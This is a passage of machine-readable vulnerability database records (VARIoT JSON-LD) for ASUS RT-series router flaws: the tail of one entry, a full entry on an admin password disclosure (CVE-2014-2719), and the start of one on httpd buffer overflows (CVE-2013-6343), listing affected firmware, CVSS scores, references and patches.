"date": "2014-10-28T00:00:00",
"db": "BID",
"id": "70791"
},
{
"date": "2016-02-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005239"
},
{
"date": "2014-11-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201410-1415"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2014-2718"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201410-1415"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ASUS RT Series router firmware arbitrary code execution vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005239"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "70791"
}
],
"trust": 0.3
}
}
VAR-201404-0636
Vulnerability from variot - Updated: 2025-04-13 23:05Advanced_System_Content.asp in the ASUS RT series routers with firmware before 3.0.0.4.374.5517, when an administrator session is active, allows remote authenticated users to obtain the administrator user name and password by reading the source code. ASUS RT-Series Wireless Routers is a wireless router device. ASUS RT-Series Wireless Routers 'Advanced_System_Content.asp' has an information disclosure vulnerability that allows an attacker to exploit a vulnerability to obtain sensitive information. ASUS RT-Series running firmware versions prior to 3.0.0.4.374.5517 are vulnerable
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201404-0636",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rt-n56u",
"scope": "eq",
"trust": 1.6,
"vendor": "asus",
"version": "3.0.0.4.318"
},
{
"model": "rt-n16",
"scope": "eq",
"trust": 1.6,
"vendor": "asus",
"version": "3.0.0.4.220"
},
{
"model": "rt-ac68u",
"scope": "eq",
"trust": 1.6,
"vendor": "asus",
"version": "3.0.0.4.374_4887"
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 1.6,
"vendor": "asus",
"version": "1.0.1.8n"
},
{
"model": "rt-ac68u",
"scope": "eq",
"trust": 1.6,
"vendor": "asus",
"version": "3.0.0.4.374.4755"
},
{
"model": "rt-n66u",
"scope": "eq",
"trust": 1.6,
"vendor": "asus",
"version": "3.0.0.4.370"
},
{
"model": "rt-n14u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.356"
},
{
"model": "rt-n10e",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "2.0.0.25"
},
{
"model": "rt-n65u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.260"
},
{
"model": "rt-n16",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "1.0.1.9"
},
{
"model": "rt-n16",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.260"
},
{
"model": "rt-n14u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.322"
},
{
"model": "tm-ac1900",
"scope": "eq",
"trust": 1.0,
"vendor": "t mobile",
"version": "3.0.0.4.376_3169"
},
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.260"
},
{
"model": "rt-ac68u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.374_4561"
},
{
"model": "rt-n10e",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "2.0.0.20"
},
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.270"
},
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.140"
},
{
"model": "rt-n16",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.3.162"
},
{
"model": "rt-n16",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "7.0.2.38b"
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.334"
},
{
"model": "rt-n16",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.3.108"
},
{
"model": "rt-n16",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.3.178"
},
{
"model": "rt-ac68u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": null
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.342"
},
{
"model": "rt-n65u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.3.134"
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "7.0.1.21"
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "1.0.1.7c"
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "7.0.1.32"
},
{
"model": "rt-n10e",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "2.0.0.24"
},
{
"model": "rt-n65u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.334"
},
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.246"
},
{
"model": "rt-n16",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "1.0.2.3"
},
{
"model": "rt-n10e",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "2.0.0.10"
},
{
"model": "rt-n65u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.3.176"
},
{
"model": "rt-n10e",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "2.0.0.19"
},
{
"model": "rt-n10e",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "2.0.0.7"
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.360"
},
{
"model": "rt-n65u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.342"
},
{
"model": "rt-n65u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.346"
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "1.0.1.4o"
},
{
"model": "rt-n10e",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "2.0.0.16"
},
{
"model": "rt-n16",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.246"
},
{
"model": "rt-n66u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.272"
},
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.220"
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "1.0.1.8j"
},
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.354"
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "1.0.1.7f"
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "8.1.1.4"
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "1.0.1.8l"
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "1.0.1.4"
},
{
"model": "rt-n16",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.354"
},
{
"model": "rt-ac66u",
"scope": "lt",
"trust": 0.8,
"vendor": "asustek computer",
"version": "3.0.0.4.374.5517"
},
{
"model": "rt-ac68u",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "rt-ac68u",
"scope": "lt",
"trust": 0.8,
"vendor": "asustek computer",
"version": "3.0.0.4.374.5517"
},
{
"model": "rt-n10e",
"scope": "lt",
"trust": 0.8,
"vendor": "asustek computer",
"version": "3.0.0.4.374.5517"
},
{
"model": "rt-n14u",
"scope": "lt",
"trust": 0.8,
"vendor": "asustek computer",
"version": "3.0.0.4.374.5517"
},
{
"model": "rt-n16",
"scope": "lt",
"trust": 0.8,
"vendor": "asustek computer",
"version": "3.0.0.4.374.5517"
},
{
"model": "rt-n56u",
"scope": "lt",
"trust": 0.8,
"vendor": "asustek computer",
"version": "3.0.0.4.374.5517"
},
{
"model": "rt-n65u",
"scope": "lt",
"trust": 0.8,
"vendor": "asustek computer",
"version": "3.0.0.4.374.5517"
},
{
"model": "rt-n66u",
"scope": "lt",
"trust": 0.8,
"vendor": "asustek computer",
"version": "3.0.0.4.374.5517"
},
{
"model": "rt-series wireless routers",
"scope": "lte",
"trust": 0.6,
"vendor": "asus",
"version": "\u003c=3.0.0.4.374.5517"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-02538"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002210"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-434"
},
{
"db": "NVD",
"id": "CVE-2014-2719"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:asus:rt-ac66u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:asus:rt-ac68u",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-ac68u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-n10e_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-n14u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-n16_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-n56u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-n65u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-n66u_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-002210"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "David Longenecker",
"sources": [
{
"db": "BID",
"id": "66954"
}
],
"trust": 0.3
},
"cve": "CVE-2014-2719",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.8,
"id": "CVE-2014-2719",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:S/C:C/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2014-02538",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 6.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.8,
"id": "VHN-70658",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:S/C:C/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-2719",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2014-2719",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2014-02538",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201404-434",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-70658",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-02538"
},
{
"db": "VULHUB",
"id": "VHN-70658"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002210"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-434"
},
{
"db": "NVD",
"id": "CVE-2014-2719"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Advanced_System_Content.asp in the ASUS RT series routers with firmware before 3.0.0.4.374.5517, when an administrator session is active, allows remote authenticated users to obtain the administrator user name and password by reading the source code. ASUS RT-Series Wireless Routers is a wireless router device. ASUS RT-Series Wireless Routers \u0027Advanced_System_Content.asp\u0027 has an information disclosure vulnerability that allows an attacker to exploit a vulnerability to obtain sensitive information. \nASUS RT-Series running firmware versions prior to 3.0.0.4.374.5517 are vulnerable",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-2719"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002210"
},
{
"db": "CNVD",
"id": "CNVD-2014-02538"
},
{
"db": "BID",
"id": "66954"
},
{
"db": "VULHUB",
"id": "VHN-70658"
}
],
"trust": 2.52
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-70658",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-70658"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-2719",
"trust": 3.1
},
{
"db": "BID",
"id": "66954",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002210",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201404-434",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2014-02538",
"trust": 0.6
},
{
"db": "FULLDISC",
"id": "20140416 ASUS RT-XXXX SOHO ROUTERS EXPOSE ADMIN PASSWORD, FIXED IN 3.0.0.4.374.5517",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "126213",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-70658",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-02538"
},
{
"db": "VULHUB",
"id": "VHN-70658"
},
{
"db": "BID",
"id": "66954"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002210"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-434"
},
{
"db": "NVD",
"id": "CVE-2014-2719"
}
]
},
"id": "VAR-201404-0636",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-02538"
},
{
"db": "VULHUB",
"id": "VHN-70658"
}
],
"trust": 1.3092795819999998
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-02538"
}
]
},
"last_update_date": "2025-04-13T23:05:08.813000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "RT-N66U",
"trust": 0.8,
"url": "http://support.asus.com/download.aspx?m=RT-N66U+%28VER.B1%29"
},
{
"title": "Cellspot router firmware update information",
"trust": 0.8,
"url": "https://support.t-mobile.com/docs/DOC-21994"
},
{
"title": "ASUS RT-Series Wireless Routers \u0027Advanced_System_Content.asp\u0027 Patch for Information Disclosure Vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/45075"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-02538"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002210"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-70658"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002210"
},
{
"db": "NVD",
"id": "CVE-2014-2719"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "http://seclists.org/fulldisclosure/2014/apr/225"
},
{
"trust": 1.7,
"url": "http://support.asus.com/download.aspx?m=rt-n66u+%28ver.b1%29"
},
{
"trust": 1.7,
"url": "http://dnlongen.blogspot.com/2014/04/cve-2014-2719-asus-rt-password-disclosure.html"
},
{
"trust": 1.1,
"url": "https://support.t-mobile.com/docs/doc-21994"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2719"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-2719"
},
{
"trust": 0.8,
"url": "http://dnlongen.blogspot.jp/2014/04/cve-2014-2719-asus-rt-password-disclosure.html"
},
{
"trust": 0.3,
"url": "http://www.asus.com/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-02538"
},
{
"db": "VULHUB",
"id": "VHN-70658"
},
{
"db": "BID",
"id": "66954"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002210"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-434"
},
{
"db": "NVD",
"id": "CVE-2014-2719"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-02538"
},
{
"db": "VULHUB",
"id": "VHN-70658"
},
{
"db": "BID",
"id": "66954"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002210"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-434"
},
{
"db": "NVD",
"id": "CVE-2014-2719"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-04-21T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-02538"
},
{
"date": "2014-04-22T00:00:00",
"db": "VULHUB",
"id": "VHN-70658"
},
{
"date": "2014-04-14T00:00:00",
"db": "BID",
"id": "66954"
},
{
"date": "2014-04-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-002210"
},
{
"date": "2014-04-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201404-434"
},
{
"date": "2014-04-22T13:06:29.493000",
"db": "NVD",
"id": "CVE-2014-2719"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-04-21T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-02538"
},
{
"date": "2016-06-30T00:00:00",
"db": "VULHUB",
"id": "VHN-70658"
},
{
"date": "2014-04-14T00:00:00",
"db": "BID",
"id": "66954"
},
{
"date": "2016-02-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-002210"
},
{
"date": "2014-04-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201404-434"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2014-2719"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201404-434"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ASUS RT-Series Wireless Routers \u0027Advanced_System_Content.asp\u0027 Information Disclosure Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-02538"
},
{
"db": "BID",
"id": "66954"
}
],
"trust": 0.9
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201404-434"
}
],
"trust": 0.6
}
}
VAR-201401-0239
Vulnerability from variot - Updated: 2025-04-11 23:01Multiple buffer overflows in web.c in httpd on the ASUS RT-N56U and RT-AC66U routers with firmware 3.0.0.4.374_979 allow remote attackers to execute arbitrary code via the (1) apps_name or (2) apps_flag parameter to APP_Installation.asp. ASUS RT-N56U / RT-AC66U is a router device developed by ASUS. ASUS RT-N56U router is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary-checks on user-supplied data. Failed attempts will likely cause a denial-of-service condition. ASUS RT-N56U running firmware 3.0.0.4.374_979 and prior are vulnerable. The vulnerability stems from the fact that the APP_Installation.asp page does not filter 'apps_name' and The 'apps_flag' parameter
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201401-0239",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "tm-ac1900",
"scope": "eq",
"trust": 1.6,
"vendor": "asus",
"version": "3.0.0.4..374_979"
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 1.6,
"vendor": "asus",
"version": "3.0.0.4..374_979"
},
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 1.6,
"vendor": "asus",
"version": "3.0.0.4..374_979"
},
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 0.8,
"vendor": "asustek computer",
"version": "3.0.0.4.374_979"
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 0.8,
"vendor": "asustek computer",
"version": "3.0.0.4.374_979"
},
{
"model": "rt-ac66u 3.0.0.4.374 979",
"scope": null,
"trust": 0.6,
"vendor": "asustek computer",
"version": null
},
{
"model": "rt-n56u 3.0.0.4.374 979",
"scope": null,
"trust": 0.6,
"vendor": "asustek computer",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00486"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005890"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-417"
},
{
"db": "NVD",
"id": "CVE-2013-6343"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:asus:rt-ac66u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-n56u_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005890"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jacob Holcomb",
"sources": [
{
"db": "BID",
"id": "65046"
}
],
"trust": 0.3
},
"cve": "CVE-2013-6343",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
